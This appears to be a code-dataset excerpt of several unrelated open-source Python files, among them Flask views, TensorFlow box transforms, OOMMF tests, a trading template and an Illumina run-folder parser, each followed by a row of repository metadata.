sender_thread = Thread(
target=send_mail,
args=[sender, recipients, subject, text_body, html_body]
)
sender_thread.start()
return sender_thread
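# Illustrative usage (a sketch; the addresses and bodies are made up):
#
#     thread = send_async_mail('[email protected]', ['[email protected]'],
#                              'Subject', 'plain-text body', '<p>HTML body</p>')
#     thread.join()  # optionally block until the mail has been handed off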
| gpl-2.0 | -4,620,640,378,158,892,000 | 26.742857 | 76 | 0.670958 | false | 3.915323 | false | false | false |
goldblade/CobemApp | app/modules/adm/controllers/perfil.py | 1 | 3226 | # -*- coding: utf-8 -*-
from flask import render_template, request, redirect, url_for, flash
from . import mod
from flask.ext.login import login_required
from flask.ext import login
from app.models import paginate
from app.modules.adm.models.usuario import Perfil
from app.modules.adm.forms.perfil import PerfilForm
from flask.ext.wtf import Form
from app import db
@mod.route('/perfil', defaults={'page' : 1})
@mod.route('/perfil/listar')
@mod.route('/perfil/listar/<int:page>')
@login_required
def perfil_listar_view(page):
perfis = Perfil.query.order_by('nome ASC').all()
res = paginate(perfis, page, Perfil, 8)
return render_template('adm/perfil/listar.html', active_page='adm', user=login.current_user, **res)
@mod.route('/perfil/adicionar', methods=["GET", "POST"])
@login_required
def perfil_adicionar_view():
form = PerfilForm(request.form)
if request.method == 'POST' and form.validate():
p = Perfil()
p.nome = form.nome.data
p.ativo = form.ativo.data
        try:
            db.session.add(p)
            db.session.commit()
        except Exception:
            flash(u'Não foi possível inserir o perfil', 'danger')
        else:
            flash(u'Perfil inserido com sucesso!', 'success')
        return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/adicionar.html', active_page='adm', user=login.current_user, form=form)
@mod.route('/perfil/editar/id/<int:id>', methods=["GET", "POST"])
@login_required
def perfil_editar_view(id):
try:
p = Perfil.query.get(id)
except:
flash(u'Perfil não encontrado', 'danger')
return redirect(url_for('.perfil_listar_view'))
form = PerfilForm(request.form, obj=p)
if request.method == 'POST' and form.validate():
p.nome = form.nome.data
p.ativo = form.ativo.data
        try:
            db.session.add(p)
            db.session.commit()
        except Exception:
            flash(u'Não foi possível alterar o perfil', 'danger')
        else:
            flash(u'Perfil foi alterado com sucesso!', 'success')
        return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/editar.html', active_page='adm', user=login.current_user, form=form)
@mod.route('/perfil/deletar/id/<int:id>', methods=["GET"])
@login_required
def perfil_deletar_view(id):
try:
p = Perfil.query.get(id)
db.session.delete(p)
db.session.commit()
flash(u'Registro removido com sucesso', 'success')
except:
flash(u'Registro não encontrado no sistema', 'danger')
return redirect(url_for('.perfil_listar_view'))
@mod.route('/perfil/exibir/id/<int:id>', methods=["GET"])
@login_required
def perfil_exibir_view(id):
try:
p = Perfil.query.get(id)
except:
flash(u'Perfil não encontrado!', 'danger')
return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/exibir.html', active_page='adm', user=login.current_user, data=p)
@mod.route('/perfil/pesquisar', methods=["POST"])
@login_required
def perfil_pesquisar_view():
q = request.form['q']
if request.method == 'POST':
if q != '':
busca_perfil = Perfil.query.filter(Perfil.nome.like('%' + q + '%')).all()
else:
busca_perfil = Perfil.query.order_by('nome ASC').all()
return render_template('adm/perfil/pesquisar.html', dados=busca_perfil) | gpl-2.0 | 5,153,285,524,558,392,000 | 32.265957 | 108 | 0.678161 | false | 2.705042 | false | false | false |
tryolabs/luminoth | luminoth/utils/bbox_transform_tf.py | 1 | 4791 | import tensorflow as tf
def get_width_upright(bboxes):
with tf.name_scope('BoundingBoxTransform/get_width_upright'):
bboxes = tf.cast(bboxes, tf.float32)
x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
width = x2 - x1 + 1.
height = y2 - y1 + 1.
# Calculate up right point of bbox (urx = up right x)
urx = x1 + .5 * width
ury = y1 + .5 * height
return width, height, urx, ury
def encode(bboxes, gt_boxes, variances=None):
with tf.name_scope('BoundingBoxTransform/encode'):
(bboxes_width, bboxes_height,
bboxes_urx, bboxes_ury) = get_width_upright(bboxes)
(gt_boxes_width, gt_boxes_height,
gt_boxes_urx, gt_boxes_ury) = get_width_upright(gt_boxes)
if variances is None:
variances = [1., 1.]
targets_dx = (gt_boxes_urx - bboxes_urx)/(bboxes_width * variances[0])
targets_dy = (gt_boxes_ury - bboxes_ury)/(bboxes_height * variances[0])
targets_dw = tf.log(gt_boxes_width / bboxes_width) / variances[1]
targets_dh = tf.log(gt_boxes_height / bboxes_height) / variances[1]
targets = tf.concat(
[targets_dx, targets_dy, targets_dw, targets_dh], axis=1)
return targets
def decode(roi, deltas, variances=None):
with tf.name_scope('BoundingBoxTransform/decode'):
(roi_width, roi_height,
roi_urx, roi_ury) = get_width_upright(roi)
dx, dy, dw, dh = tf.split(deltas, 4, axis=1)
if variances is None:
variances = [1., 1.]
pred_ur_x = dx * roi_width * variances[0] + roi_urx
pred_ur_y = dy * roi_height * variances[0] + roi_ury
pred_w = tf.exp(dw * variances[1]) * roi_width
pred_h = tf.exp(dh * variances[1]) * roi_height
bbox_x1 = pred_ur_x - 0.5 * pred_w
bbox_y1 = pred_ur_y - 0.5 * pred_h
# This -1. extra is different from reference implementation.
bbox_x2 = pred_ur_x + 0.5 * pred_w - 1.
bbox_y2 = pred_ur_y + 0.5 * pred_h - 1.
bboxes = tf.concat(
[bbox_x1, bbox_y1, bbox_x2, bbox_y2], axis=1)
return bboxes
def clip_boxes(bboxes, imshape):
"""
Clips bounding boxes to image boundaries based on image shape.
Args:
bboxes: Tensor with shape (num_bboxes, 4)
where point order is x1, y1, x2, y2.
imshape: Tensor with shape (2, )
where the first value is height and the next is width.
Returns
Tensor with same shape as bboxes but making sure that none
of the bboxes are outside the image.
"""
with tf.name_scope('BoundingBoxTransform/clip_bboxes'):
bboxes = tf.cast(bboxes, dtype=tf.float32)
imshape = tf.cast(imshape, dtype=tf.float32)
x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
width = imshape[1]
height = imshape[0]
x1 = tf.maximum(tf.minimum(x1, width - 1.0), 0.0)
x2 = tf.maximum(tf.minimum(x2, width - 1.0), 0.0)
y1 = tf.maximum(tf.minimum(y1, height - 1.0), 0.0)
y2 = tf.maximum(tf.minimum(y2, height - 1.0), 0.0)
bboxes = tf.concat([x1, y1, x2, y2], axis=1)
return bboxes
def change_order(bboxes):
"""Change bounding box encoding order.
TensorFlow works with the (y_min, x_min, y_max, x_max) order while we work
    with the (x_min, y_min, x_max, y_max) order.
    While both encoding options have their advantages and disadvantages we
    decided to use the (x_min, y_min, x_max, y_max) order, forcing us to switch to
TensorFlow's every time we want to use a std function that handles bounding
boxes.
Args:
bboxes: A Tensor of shape (total_bboxes, 4)
Returns:
bboxes: A Tensor of shape (total_bboxes, 4) with the order swaped.
"""
with tf.name_scope('BoundingBoxTransform/change_order'):
first_min, second_min, first_max, second_max = tf.unstack(
bboxes, axis=1
)
bboxes = tf.stack(
[second_min, first_min, second_max, first_max], axis=1
)
return bboxes
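# Worked example (illustrative, not part of the original module): a box given as
# [x_min, y_min, x_max, y_max] = [10., 20., 30., 40.] comes back from change_order
# as [20., 10., 40., 30.], i.e. in TensorFlow's (y_min, x_min, y_max, x_max) order.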
if __name__ == '__main__':
import numpy as np
bboxes = tf.placeholder(tf.float32)
bboxes_val = [[10, 10, 20, 22]]
gt_boxes = tf.placeholder(tf.float32)
gt_boxes_val = [[11, 13, 34, 31]]
imshape = tf.placeholder(tf.int32)
imshape_val = (100, 100)
deltas = encode(bboxes, gt_boxes)
decoded_bboxes = decode(bboxes, deltas)
final_decoded_bboxes = clip_boxes(decoded_bboxes, imshape)
with tf.Session() as sess:
final_decoded_bboxes = sess.run(final_decoded_bboxes, feed_dict={
bboxes: bboxes_val,
gt_boxes: gt_boxes_val,
imshape: imshape_val,
})
assert np.all(gt_boxes_val == final_decoded_bboxes)
| bsd-3-clause | 302,808,356,167,152,300 | 30.519737 | 79 | 0.591943 | false | 3.096962 | false | false | false |
uber-common/opentracing-python-instrumentation | opentracing_instrumentation/utils.py | 1 | 1743 | # Copyright (c) 2015 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import
import opentracing
def start_child_span(operation_name, tracer=None, parent=None, tags=None):
"""
Start a new span as a child of parent_span. If parent_span is None,
start a new root span.
:param operation_name: operation name
:param tracer: Tracer or None (defaults to opentracing.tracer)
:param parent: parent Span or None
:param tags: optional tags
:return: new span
"""
tracer = tracer or opentracing.tracer
return tracer.start_span(
operation_name=operation_name,
child_of=parent.context if parent else None,
tags=tags
)
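# Illustrative usage (a sketch; the operation names and tags are made up):
#
#     parent_span = opentracing.tracer.start_span('handle_request')
#     child_span = start_child_span('db_query', parent=parent_span,
#                                   tags={'db.type': 'sql'})
#     child_span.finish()
#     parent_span.finish()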
| mit | 4,675,019,730,161,642,000 | 41.512195 | 79 | 0.743546 | false | 4.240876 | false | false | false |
sadimusi/mc4p | mc4p/util.py | 2 | 3264 | # -*- coding: utf-8 -*-
# This source file is part of mc4p,
# the Minecraft Portable Protocol-Parsing Proxy.
#
# Copyright (C) 2011 Matthew J. McGill, Simon Marti
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os.path, logging, logging.config
class PartialPacketException(Exception):
"""Thrown during parsing when not a complete packet is not available."""
pass
class Stream(object):
"""Represent a stream of bytes."""
def __init__(self):
"""Initialize the stream."""
self.buf = ""
self.i = 0
self.tot_bytes = 0
self.wasted_bytes = 0
def append(self,str):
"""Append a string to the stream."""
self.buf += str
def read(self,n):
"""Read n bytes, returned as a string."""
if self.i + n > len(self.buf):
self.wasted_bytes += self.i
self.i = 0
raise PartialPacketException()
str = self.buf[self.i:self.i+n]
self.i += n
return str
def reset(self):
self.i = 0
def packet_finished(self):
"""Mark the completion of a packet, and return its bytes as a string."""
# Discard all data that was read for the previous packet,
# and reset i.
data = ""
if self.i > 0:
data = self.buf[:self.i]
self.buf = self.buf[self.i:]
self.tot_bytes += self.i
self.i = 0
return data
def __len__(self):
return len(self.buf) - self.i
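# Illustrative usage of Stream (a sketch; the byte values are made up):
#
#     s = Stream()
#     s.append("\x01\x02\x03")
#     header = s.read(2)        # ok, two bytes are available
#     try:
#         body = s.read(4)      # only one byte left -> PartialPacketException
#     except PartialPacketException:
#         pass                  # read position is reset to the packet start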
def write_default_logging_file(lpath):
"""Write a default logging.conf."""
contents="""
[loggers]
keys=root,mc4p,plugins,parsing
[handlers]
keys=consoleHdlr
[formatters]
keys=defaultFormatter
[logger_root]
level=WARN
handlers=consoleHdlr
[logger_mc4p]
handlers=
qualname=mc4p
[logger_plugins]
handlers=
qualname=plugins
[logger_parsing]
handlers=
qualname=parsing
[handler_consoleHdlr]
class=StreamHandler
formatter=defaultFormatter
args=(sys.stdout,)
[formatter_defaultFormatter]
format=%(levelname)s|%(asctime)s|%(name)s - %(message)s
datefmt=%H:%M:%S
"""
f=None
try:
f=open(lpath,"w")
f.write(contents)
finally:
if f: f.close()
logging_configured = False
def config_logging(logfile=None):
"""Configure logging. Can safely be called multiple times."""
global logging_configured
if not logging_configured:
dir = os.path.dirname(os.path.abspath(__file__))
if not logfile:
logfile = os.path.join(dir, 'logging.conf')
if not os.path.exists(logfile):
write_default_logging_file(logfile)
logging.config.fileConfig(logfile)
logging_configured = True
| gpl-2.0 | 2,994,194,222,830,003,000 | 24.700787 | 80 | 0.643382 | false | 3.688136 | true | false | false |
CCI-Tools/ect-core | cate/util/sround.py | 2 | 1479 | from typing import Tuple
import math
# max number of significant digits for a 64-bit float
_MAX_SIGNIFICANT_DIGITS_AFTER_DOT = 15
_MIN_EXP = -323
_MAX_EXP = 308
def sround(value: float, ndigits: int = 0, int_part=False) -> float:
"""
Round *value* to significant number of digits *ndigits*.
:param value: The value to round.
:param ndigits: The number of digits after the first significant digit.
    :param int_part: If True, rounding may also reach into the integer part
        (i.e. a negative precision may be passed to round()); if False, the
        integer part is never rounded away.
    :return: The value rounded to the requested number of significant digits.
"""
ndigits_extra = _ndigits_extra(value, int_part=int_part)
ndigits += ndigits_extra
return round(value, ndigits=ndigits)
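# Illustrative values (assumed behaviour, derived from the implementation above;
# not taken from the original source):
#     sround(0.012345, 2)              -> 0.0123   (2 digits after the leading '1')
#     sround(1234.5, 1, int_part=True) -> 1200.0   (rounding reaches the integer part)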
def sround_range(range_value: Tuple[float, float], ndigits: int = 0, int_part=False) -> Tuple[float, float]:
value_1, value_2 = range_value
ndigits_extra_1 = _ndigits_extra(value_1, int_part=int_part)
ndigits_extra_2 = _ndigits_extra(value_2, int_part=int_part)
ndigits += min(ndigits_extra_1, ndigits_extra_2)
return round(value_1, ndigits=ndigits), round(value_2, ndigits=ndigits)
def _ndigits_extra(value: float, int_part: bool) -> int:
ndigits = -int(math.floor(_limited_log10(value)))
if ndigits < 0 and not int_part:
return 0
return ndigits
def _limited_log10(value: float) -> float:
if value > 0.0:
exp = math.log10(value)
elif value < 0.0:
exp = math.log10(-value)
else:
return _MIN_EXP
if exp < _MIN_EXP:
return _MIN_EXP
if exp > _MAX_EXP:
return _MAX_EXP
return exp
| mit | -1,770,504,944,185,274,000 | 26.90566 | 108 | 0.648411 | false | 3.087683 | false | false | false |
janinamass/gardening | Scythe/src/Tools/Scythe_gff2loc.py | 1 | 2365 | #!/usr/bin/python
import re,sys, getopt
#####################################
# last update 03/31/2013 by J. Mass #
# version = '0.1' #
#####################################
def usage():
print ("""
##############################
# Scythe_gff2loc.py v0.1 #
##############################
-f, --file=gff3_FILE (tested w/ _gene.gff3 from phytozome)
-o, --output=FILE output file [default: gff3_FILE.loc]
-h, --help prints this
""")
sys.exit(2)
def read_gff2loc(infile, outfile):
infile = open(infile, 'r')
outfile = open(outfile, 'w')
loci = {}
longest = {}
rawstr = r"""(Name=)(.*);pacid.*(longest=)(.*);(Parent=)(.*)"""
cnt = 0
for ln in infile:
s =ln
m = re.findall(rawstr, s)
if len(m) >0:
name = m[0][1]
isLongest = m[0][3]
parent = m[0][5]
if isLongest == str(1):
if parent in longest:
print("#Warning "+parent+" has more than one default model\nCheck your gff -> ", longest[parent], name)
longest[parent]=name #longest will be printed to 2nd col
elif isLongest == str(0):
if parent in loci:
loci[parent].append(name)
else:
loci[parent]=[name]
s_def = sorted(longest.keys())
for k_def in s_def:
try:
outfile.write(k_def+"\t"+longest[k_def]+"\t"+"\t".join(loci[k_def])+"\n")
except KeyError as ke:
outfile.write(k_def+"\t"+longest[k_def]+"\n")
if k_def in loci:
del loci[k_def]
s = sorted(loci.keys())
for k in s:
try:
outfile.write(k+"\t"+longest[k]+"\t"+"\t".join(loci[k])+"\n")
except KeyError as ke:
print("#Warning "+k+" has no default model\n")
outfile.write(k+"\t"+"\t".join(loci[k])+"\n")
return loci
###################################
outfile = None
infile = None
###################################
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "f:ho:", ["file=","help", "output="])
except getopt.GetoptError as err:
print (str(err))
usage()
for o, a in opts:
if o in ("-f", "--file"):
infile=a
elif o in ("-h", "--help"):
usage()
elif o in ("-o", "--output"):
outfile = a
else:
assert False, "unhandled option"
########################################
if infile is None:
usage()
if outfile is None:
outfile = infile+".loc"
########################################
read_gff2loc(infile, outfile)
| gpl-3.0 | 4,433,694,549,720,110,000 | 26.183908 | 108 | 0.49556 | false | 2.997465 | false | false | false |
etuna-SBF-kog/Stadsparken | env/lib/python2.7/site-packages/mustachejs/tests/utils.py | 4 | 1294 | """
Testing utilities backported from recent Django versions, for testing with
older Django versions.
"""
from __future__ import with_statement
from django.conf import settings, UserSettingsHolder
from django.utils.functional import wraps
class override_settings(object):
"""
Acts as either a decorator, or a context manager. If it's a decorator it
takes a function and returns a wrapped function. If it's a contextmanager
it's used with the ``with`` statement. In either event entering/exiting
are called before and after, respectively, the function/block is executed.
"""
def __init__(self, **kwargs):
self.options = kwargs
self.wrapped = settings._wrapped
def __enter__(self):
self.enable()
def __exit__(self, exc_type, exc_value, traceback):
self.disable()
def __call__(self, func):
@wraps(func)
def inner(*args, **kwargs):
with self:
return func(*args, **kwargs)
return inner
def enable(self):
override = UserSettingsHolder(settings._wrapped)
for key, new_value in self.options.items():
setattr(override, key, new_value)
settings._wrapped = override
def disable(self):
settings._wrapped = self.wrapped
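# Illustrative usage (a sketch; the setting name is only an example):
#
#     @override_settings(TEMPLATE_DEBUG=True)
#     def test_something(self):
#         ...
#
#     with override_settings(TEMPLATE_DEBUG=True):
#         ...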
| gpl-3.0 | -2,958,675,292,093,917,000 | 27.755556 | 78 | 0.646832 | false | 4.386441 | false | false | false |
viswimmer1/PythonGenerator | data/python_files/33345232/save_utils.py | 1 | 3968 | import os
from zipfile import ZipFile
from itertools import izip_longest
from django.conf import settings
from utils import save_to_file, save_to_zip, set_header, get_diff
from apps.weapon.models import Weapon, ECM, Sensor, Repair, Construction, Brain, WeaponSound
from apps.structure.models import Structure, StructureDefence, StructureWeapon, BodyDefence, Feature
from apps.function.models import StructureFunction, Function
from apps.body.models import Body, Propulsion, PropulsionSound, PropulsionType, BodyPropulsion
from apps.templates.models import Template, TemplateWeapon
from apps.research.models import (Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1,
ResearchStructure_Cam1, ResultComponent_Cam1,
ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2,
ResearchStructure_Cam2, ResultComponent_Cam2,
ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3,
ResearchStructure_Cam3, ResultComponent_Cam3,
ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer,
ResearchStructure_Multiplayer, ResultComponent_Multiplayer,
ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer)
classes = [
Weapon,
Feature,
Construction,
Structure,
StructureFunction,
Body,
Propulsion,
PropulsionSound,
PropulsionType,
StructureDefence,
StructureWeapon,
Function,
BodyDefence,
ECM,
Sensor,
Repair,
BodyPropulsion,
Brain,
WeaponSound,
Template,
TemplateWeapon,
Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1,
ResearchStructure_Cam1, ResultComponent_Cam1,
ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2,
ResearchStructure_Cam2, ResultComponent_Cam2,
ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3,
ResearchStructure_Cam3, ResultComponent_Cam3,
ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer,
ResearchStructure_Multiplayer, ResultComponent_Multiplayer,
ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer
]
classes = [x for x in classes if x.objects.count()]
def save_all():
[set_header(x) for x in classes if not x.load_from_first]
texts = [cls.get_data() for cls in classes]
diffs = [get_diff(cls, text) for cls, text in zip(classes, texts)]
if settings.MOD_SOURCE:
[save_to_file(cls, text) for cls, text in zip(classes, texts)]
else:
zf = ZipFile(settings.PATH_TO_MOD)
names = set(zf.namelist()) - set([x.FILE_PATH for x in classes])
data = [(path, zf.read(path)) for path in names]
zf.close()
zf = ZipFile(settings.PATH_TO_MOD, 'w')
[save_to_zip(cls, zf, text) for cls, text in zip(classes, texts)]
[zf.writestr(file, text) for file, text in data]
zf.close()
return diffs
def save_xml():
'does not work with archive'
texts = [cls.get_xml() for cls in classes]
[save_to_file(cls, text, format='xml') for cls, text in zip(classes, texts)]
return [['Saved to XML', [('green', 'ok')]]]
| gpl-2.0 | 3,776,653,706,209,634,300 | 46.238095 | 212 | 0.715222 | false | 3.830116 | false | false | false |
chandinijain/Auquan-Toolbox | TradingStrategyTemplate.py | 1 | 3670 | from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
import numpy as np
from pythonToolbox.toolbox import backtest
def settings():
exchange = "stocks" # Exchange to download data for (nyse or nasdaq)
markets = ['A','AAPL','IBM','GOOG','C']
# Stocks to download data for.
# Leave blank to download all stocks for the exchange (~900 stocks)
date_start = '2015-01-03' # Date to start the backtest
date_end = '2016-11-06' # Date to end the backtest
lookback = 120 # Number of days you want historical data for
""" To make a decision for day t, your algorithm will have historical data
from t-lookback to t-1 days"""
return [exchange, markets, date_start, date_end, lookback]
def trading_strategy(lookback_data):
"""
:param lookback_data: Historical Data for the past "lookback" number of days as set in the main settings.
It is a dictionary of features such as,
'OPEN', 'CLOSE', 'HIGH', 'LOW', 'VOLUME', 'SLIPPAGE', 'POSITION', 'ORDER',
'FILLED_ORDER', 'DAILY_PNL', 'TOTAL_PNL', 'FUNDS', 'VALUE'
    Any feature data can be accessed as: lookback_data['OPEN']
    The output is a pandas dataframe with dates as the index (row)
    and markets as columns.

    To see a complete list of features, uncomment the line below.
    """
    # print(lookback_data.keys())
    """
:return: A pandas dataframe with markets you are trading as index(row) and
signal, price and quantity as columns
order['SIGNAL']:buy (+1), hold (0) or sell (-1) trading signals for all securities in markets[]
order['PRICE']: The price where you want to trade each security. Buy orders are executed at or below the price and sell orders are executed at or above the price
order['QUANTITY']: The quantity of each stock you want to trade.
System will buy the specified quantity of stock if it's price <= price specified here
System will sell the specified quantity of a stock if it's price >= price specified here
"""
"""IMPORTANT: Please make sure you have enough funds to buy or sell.
Order is cancelled if order_value > available funds(both buy and short sell)"""
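    # Illustrative only (hypothetical ticker): a long signal with full weight at a limit price
    # could be expressed on the 'order' dataframe built below as
    #   order.loc['AAPL', ['SIGNAL', 'WEIGHTS', 'PRICE']] = [1, 1.0, 100.0]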
order = pd.DataFrame(0, index=lookback_data['POSITION'].columns, columns = ['SIGNAL','WEIGHTS','PRICE'])
##YOUR CODE HERE
period1 = 120
period2 = 30
markets_close = lookback_data['CLOSE']
market_open = lookback_data['OPEN']
avg_p1 = markets_close[-period1 : ].sum() / period1
avg_p2 = markets_close[-period2 : ].sum() / period2
sdev_p1 = np.std(markets_close[-period1 : ], axis=0)
difference = avg_p1 - avg_p2
deviation = pd.Series(0, index=lookback_data['POSITION'].columns)
criteria_1 = np.abs(difference)>sdev_p1
criteria_2 = np.sign(difference) == np.sign(lookback_data['POSITION'])
deviation[criteria_1] = difference
deviation[criteria_2] = difference
total_deviation = np.absolute(deviation).sum()
if total_deviation==0:
return order
else:
order['WEIGHTS']= np.absolute(deviation/total_deviation)
order['SIGNAL'] = np.sign(deviation)
# order['PRICE'][order['SIGNAL']>0] = (avg_p1-sdev_p1)[order['SIGNAL']>0]
# order['PRICE'][order['SIGNAL']<0] = (avg_p1+sdev_p1)[order['SIGNAL']<0]
return order
if __name__ == '__main__':
[exchange, markets, date_start, date_end, lookback] = settings()
backtest(exchange, markets, trading_strategy, date_start, date_end, lookback)#,verbose=True)
| mit | -4,952,343,690,289,032,000 | 44.308642 | 165 | 0.644687 | false | 3.532243 | false | false | false |
ryanpepper/oommf-python | vision/oommf/test_oommf.py | 2 | 1514 | import pytest
def test_oommf_sim():
import oommf
import os.path
oommf.path = "/home/vagrant/oommf-python/oommf/oommf/"
Py = oommf.materials.permalloy
my_geometry = oommf.geometry.Cuboid(
(0, 0, 0), (30, 30, 100), unitlength=1e-9)
sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=Py)
sim.m = [1, 1, 0]
assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.'
sim.advance_time(1e-9)
assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.\n\tCurrent t = 1e-09s'
assert os.path.isfile('Simulation_0.0_1e-09.mif')
os.system('rm Simulation_0.0_1e-09.mif')
@pytest.mark.xfail
def test_mif_assemble():
import oommf
import oommf.mifgen
NiFe = oommf.materials.NiFe
my_geometry = oommf.geometry.Cuboid(
(0, 0, 0), (310, 310, 40), unitlength=1e-9)
sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=NiFe)
mifpath = oommf.mifgen._assemble_mif(sim)
f = open(mifpath, 'r')
f2 = open('oommf.oommfpath' + '/app/oxs/examples/square.mif')
constructed_miffile = f.read()
read_miffile = f2.read()
assert constructed_miffile == read_miffile
def test_material():
import oommf.materials
assert str(oommf.materials.permalloy) == 'Py(Fe80Ni20)'
assert oommf.materials.permalloy.A == 13e-12
| bsd-2-clause | 7,453,137,607,101,006,000 | 38.842105 | 184 | 0.638045 | false | 2.544538 | false | false | false |
kate-v-stepanova/flowcell_parser | flowcell_parser/classes.py | 1 | 18602 |
import re
import os
import csv
import xml.etree.ElementTree as ET
import logging
import glob
from datetime import datetime
from collections import OrderedDict
from bs4 import BeautifulSoup #html parser
class RunParser(object):
"""Parses an Illumina run folder. It generates data for statusdb
notable attributes :
:RunInfoParser runinfo: see RunInfo
:RunParametersParser runparameters: see RunParametersParser
:SampleSheetParser samplesheet: see SampleSheetParser
:LaneBarcodeParser lanebarcodes: see LaneBarcodeParser
"""
def __init__(self, path):
if os.path.exists(path):
self.log=logging.getLogger(__name__)
self.path=path
self.parse()
self.create_db_obj()
else:
raise os.error(" flowcell cannot be found at {0}".format(path))
def parse(self, demultiplexingDir='Demultiplexing'):
"""Tries to parse as many files as possible from a run folder"""
fc_name=os.path.basename(os.path.abspath(self.path)).split('_')[-1][1:]
rinfo_path=os.path.join(self.path, 'RunInfo.xml')
rpar_path=os.path.join(self.path, 'runParameters.xml')
ss_path=os.path.join(self.path, 'SampleSheet.csv')
lb_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'laneBarcode.html')
ln_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'lane.html')
undeterminedStatsFolder = os.path.join(self.path, demultiplexingDir, "Stats")
cycle_times_log = os.path.join(self.path, 'Logs', "CycleTimes.txt")
try:
self.runinfo=RunInfoParser(rinfo_path)
except OSError as e:
self.log.info(str(e))
self.runinfo=None
try:
self.runparameters=RunParametersParser(rpar_path)
except OSError as e:
self.log.info(str(e))
            self.runparameters=None
try:
self.samplesheet=SampleSheetParser(ss_path)
except OSError as e:
self.log.info(str(e))
self.samplesheet=None
try:
self.lanebarcodes=LaneBarcodeParser(lb_path)
except OSError as e:
self.log.info(str(e))
self.lanebarcodes=None
try:
self.lanes=LaneBarcodeParser(ln_path)
except OSError as e:
self.log.info(str(e))
self.lanes=None
try:
self.undet=DemuxSummaryParser(undeterminedStatsFolder)
except OSError as e:
self.log.info(str(e))
self.undet=None
try:
self.time_cycles = CycleTimesParser(cycle_times_log)
except OSError as e:
self.log.info(str(e))
self.time_cycles = None
def create_db_obj(self):
self.obj={}
bits=os.path.basename(os.path.abspath(self.path)).split('_')
name="{0}_{1}".format(bits[0], bits[-1])
self.obj['name']=name
if self.runinfo:
self.obj['RunInfo']=self.runinfo.data
if self.runinfo.recipe:
self.obj['run_setup']=self.runinfo.recipe
if self.runparameters:
self.obj.update(self.runparameters.data)
if self.runparameters.recipe:
self.obj['run_setup']=self.runparameters.recipe
if self.samplesheet:
self.obj['samplesheet_csv']=self.samplesheet.data
if self.lanebarcodes:
self.obj['illumina']={}
self.obj['illumina']['Demultiplex_Stats']={}
self.obj['illumina']['Demultiplex_Stats']['Barcode_lane_statistics']=self.lanebarcodes.sample_data
self.obj['illumina']['Demultiplex_Stats']['Flowcell_stats']=self.lanebarcodes.flowcell_data
if self.lanes:
self.obj['illumina']['Demultiplex_Stats']['Lanes_stats']=self.lanes.sample_data
if self.undet:
self.obj['Undetermined']=self.undet.result
if self.time_cycles:
self.obj['time cycles'] = self.time_cycles
class DemuxSummaryParser(object):
def __init__(self, path):
if os.path.exists(path):
self.path=path
self.result={}
self.TOTAL = {}
self.parse()
else:
raise os.error("DemuxSummary folder {0} cannot be found".format(path))
def parse(self):
        # will only save the 50 most frequent indexes
